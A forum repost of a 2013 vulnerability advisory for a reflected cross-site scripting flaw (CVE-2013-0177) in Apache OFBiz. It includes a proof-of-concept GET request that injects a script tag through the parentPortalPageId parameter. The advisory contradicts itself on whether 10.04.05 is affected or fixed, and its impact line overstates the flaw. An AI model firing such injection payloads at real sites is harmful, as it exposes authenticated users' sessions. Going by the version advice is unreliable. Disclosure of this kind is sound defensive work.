Praetorian503 Posted January 21, 2013

Apache OFBiz versions 10.04.05 and below and 11.04.01 and below suffer from a reflected cross site scripting vulnerability. Full exploitation details provided.

Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz
Type: Remote
Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)
CVE: CVE-2013-0177
Impact: Direct execution of arbitrary code in the context of Webserver user.
Release Date: 18.01.2013

Summary
=======
Apache Open For Business (Apache OFBiz) is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.

Description
===========
Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and Image.alt Widget attributes because the content of these two elements is not properly escaped.

Vendor
======
Apache ofbiz - http://ofbiz.apache.org/

PoC
===
It is worth mentioning that originally the resource was using the HTTP method POST, but it was changed to GET to exploit it more easily.
Something important to remark is that for this attack to work, the victim should be authenticated.

Below you can see how the URL is specially crafted to expose the issue:

Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages
-> parameter: parentPortalPageId==[XSS]

GET /exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script> HTTP/1.1
Host: 10.10.10.14:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002

Solution
========
10.04.* users should upgrade to 10.04.05
11.04.01 users should upgrade to 11.04.02

Vendor Status
=============
[08.01.2013] Vulnerability discovered.
[09.01.2013] Vendor informed.
[09.01.2013] Vendor replied.
[12.01.2013] Vendor reveals patch release date.
[18.01.2013] Public advisory.

Source: PacketStorm